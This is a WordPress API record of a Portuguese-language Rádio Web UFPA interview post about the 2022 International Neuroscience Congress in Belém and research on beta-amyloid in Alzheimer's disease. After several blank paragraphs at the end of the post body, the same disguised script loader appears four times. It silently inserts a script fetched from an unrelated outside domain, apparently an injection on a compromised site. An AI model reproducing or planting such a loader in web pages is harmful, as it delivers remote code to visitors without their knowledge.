{"id":10524,"date":"2022-05-16T17:12:44","date_gmt":"2022-05-16T20:12:44","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=10524"},"modified":"2025-10-21T13:16:14","modified_gmt":"2025-10-21T16:16:14","slug":"congresso-internacional-de-neurociencias","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/","title":{"rendered":"Congresso Internacional de Neuroci\u00eancias"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Congresso Internacional de Neuroci\u00eancias&#8221;<\/p><p class=\"category\">UFPA Entrevista<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/UFPA-ENTREVISTA-CONGRESSO-INTERNACIONAL-DE-NEUROCIENCIAS-16.05.22.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p>O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista. No programa, a jornalista Elissandra Batista conversa com o estudante e pesquisador Mateus Silva. O doutorando em neuroci\u00eancias faz parte da organiza\u00e7\u00e3o do evento, que ser\u00e1 realizado em Bel\u00e9m, e pela primeira vez no Brasil, entre os dias 11 e 14 de setembro de 2022. <\/p>\n\n\n\n<p>Na modalidade h\u00edbrida, com atividades presenciais e pela internet, o encontro vai reunir pesquisadores como Edvard Moser (Pr\u00eamio Nobel de Medicina e Fisiologia, 2014); Tracy Bale (Diretor do Centro de Pesquisa Epigen\u00e9tica em Sa\u00fade Infantil e Desenvolvimento do C\u00e9rebro \u2013 CERCH); Rommy Von Bernhardi (Reitor da Faculdade de Ci\u00eancias da Sa\u00fade \u2013 Universidade de San Sebastian, Chile)  e muitos outros.<\/p>\n\n\n\n<p>Realizado de quatro em quatro anos, o Congresso Internacional de Neuroci\u00eancias  \u00e9 organizado pela Federa\u00e7\u00e3o das Associa\u00e7\u00f5es Latino Americanas e Caribenhas (FALAN). O objetivo \u00e9 reunir pessoas do mundo inteiro para discutir os avan\u00e7os e as novas fronteiras das Neuroci\u00eancias. O funcionamento do c\u00e9rebro e as terapias para transtornos psiqui\u00e1tricos e doen\u00e7as neurodegenerativas, como o Alzheimer, est\u00e3o entre os temas da programa\u00e7\u00e3o. <\/p>\n\n\n\n<p>Mateus Silva explica, por exemplo, que a doen\u00e7a de Alzheimer \u00e9 associada ao acumulo, no enc\u00e9falo, de uma prote\u00edna chamada Beta-amil\u00f3ide, que provoca a perda das c\u00e9lulas de neur\u00f4nios, afetando fortemente a mem\u00f3ria dos pacientes. Ainda de acordo com Mateus, o que foi descoberto de novo nesse sentido \u00e9 que a Beta-amil\u00f3ide n\u00e3o surge somente em uma condi\u00e7\u00e3o de  Alzheimer. Na verdade, ela participa da forma\u00e7\u00e3o do c\u00e9rebro humano. <\/p>\n\n\n\n<p>&#8220;Ela aparece durante a forma\u00e7\u00e3o do c\u00e9rebro e depois some. E em algumas pessoas acontece o que n\u00f3s chamamos de Alzheimer espor\u00e1dico, quando a doen\u00e7a simplesmente surge. E isso acontece quando essa prote\u00edna volta aparecer.  Essa descoberta mudou muito a concep\u00e7\u00e3o de que a Beta-amil\u00f3ide est\u00e1 inteiramente ligada a uma condi\u00e7\u00e3o de patologia. Na verdade, ela tem um papel no sistema nervoso. E descobrir qual \u00e9 esse papel, descobrir o que faz ela sumir durante o desenvolvimento talvez seja a pista que n\u00f3s precisamos para desenvolver uma terapia mais eficiente para o Alzheimer&#8221;, relata Mateus.<\/p>\n\n\n\n<p>Sobre a import\u00e2ncia da realiza\u00e7\u00e3o do  Congresso Internacional de Neuroci\u00eancias em Bel\u00e9m, Mateus destaca que a cidade foi uma dentre centenas de candidatas latino americanas e caribenhas na elei\u00e7\u00e3o. E que o munic\u00edpio foi escolhido pela relev\u00e2ncias cultural e intelectual na \u00e1rea das neuroci\u00eancias. &#8220;No \u00e2mbito da realidade amaz\u00f4nica no campo neurocient\u00edfico, a capital paraense \u00e9 vista como um dos grandes centros de estudos e pesquisas para a p\u00f3s-gradua\u00e7\u00e3o em neuroci\u00eancias, comparando-se aos polos tradicionais, como Rio de Janeiro, S\u00e3o Paulo e Rio Grande do Sul. Especificamente na UFPA, os debates e a relev\u00e2ncia das neuroci\u00eancias mostram-se fortemente presentes, sobretudo em \u00e1reas como a Psicologia, as Ci\u00eancias Biol\u00f3gicas e a pr\u00f3pria \u00e1rea de sa\u00fade.&#8221;<\/p>\n\n\n\n<p>Para saber mais sobre a import\u00e2ncia das tem\u00e1ticas que ser\u00e3o apresentados no terceiro Congresso Internacional de Neuroci\u00eancias, n\u00e3o perca esta edi\u00e7\u00e3o do UFPA Entrevista.  O programa vai ao toda segunda-feira, \u00e0s 11h, com reprise quarta-feira, \u00e0s 20h.<\/p>\n\n\n\n<p>Servi\u00e7o &#8211; III Congresso Internacional de Neuroci\u00eancias<\/p>\n\n\n\n<p>Data: 11 a 14 de setembro de 2022<\/p>\n\n\n\n<p>Local: Hangar Centro de Conven\u00e7\u00f5es e plataforma virtual dispon\u00edvel no site<\/p>\n\n\n\n<p>Inscri\u00e7\u00f5es: Dispon\u00edveis at\u00e9 o dia 10 de setembro<\/p>\n\n\n\n<p>Taxa: consulte o primeiro lote de inscri\u00e7\u00e3o que encerra no dia 31 de maio. (inscri\u00e7\u00f5es em grupo t\u00eam desconto).<\/p>\n\n\n\n<p>Site:&nbsp; <a href=\"https:\/\/falan2022.com.br\/inicial\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/falan2022.com.br\/inicial\/<\/a><\/p>\n\n\n\n<p>Imagem: <a href=\"https:\/\/jornal.usp.br\/tag\/neurociencias\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/jornal.usp.br\/tag\/neurociencias\/<\/a> <\/p>\n\n\n\n<p>      <\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>          <\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Congresso Internacional de Neuroci\u00eancias\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\" aria-label=\"Read more about Congresso Internacional de Neuroci\u00eancias\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":10564,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[36],"tags":[],"class_list":["post-10524","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-entrevista"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Congresso Internacional de Neuroci\u00eancias - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o doutorando Mateus Silva.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Congresso Internacional de Neuroci\u00eancias - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o doutorando Mateus Silva.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-16T20:12:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:16:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"403\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Congresso Internacional de Neuroci\u00eancias\",\"datePublished\":\"2022-05-16T20:12:44+00:00\",\"dateModified\":\"2025-10-21T16:16:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\"},\"wordCount\":640,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1\",\"articleSection\":[\"UFPA Entrevista\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\",\"name\":\"Congresso Internacional de Neuroci\u00eancias - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1\",\"datePublished\":\"2022-05-16T20:12:44+00:00\",\"dateModified\":\"2025-10-21T16:16:14+00:00\",\"description\":\"O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o doutorando Mateus Silva.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1\",\"width\":768,\"height\":403,\"caption\":\"Congresso Internacional de Neuroci\u00eancias\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Congresso Internacional de Neuroci\u00eancias\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Congresso Internacional de Neuroci\u00eancias - Radio Web UFPA","description":"O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o doutorando Mateus Silva.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/","og_locale":"pt_BR","og_type":"article","og_title":"Congresso Internacional de Neuroci\u00eancias - Radio Web UFPA","og_description":"O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o doutorando Mateus Silva.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2022-05-16T20:12:44+00:00","article_modified_time":"2025-10-21T16:16:14+00:00","og_image":[{"width":768,"height":403,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Congresso Internacional de Neuroci\u00eancias","datePublished":"2022-05-16T20:12:44+00:00","dateModified":"2025-10-21T16:16:14+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/"},"wordCount":640,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1","articleSection":["UFPA Entrevista"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/","name":"Congresso Internacional de Neuroci\u00eancias - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1","datePublished":"2022-05-16T20:12:44+00:00","dateModified":"2025-10-21T16:16:14+00:00","description":"O terceiro Congresso Internacional de Neuroci\u00eancias \u00e9 o destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o doutorando Mateus Silva.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1","width":768,"height":403,"caption":"Congresso Internacional de Neuroci\u00eancias"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/congresso-internacional-de-neurociencias\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Congresso Internacional de Neuroci\u00eancias"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/05\/neurociencias.jpg?fit=768%2C403&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2JK","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10524","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=10524"}],"version-history":[{"count":19,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10524\/revisions"}],"predecessor-version":[{"id":17876,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10524\/revisions\/17876"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/10564"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=10524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=10524"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=10524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}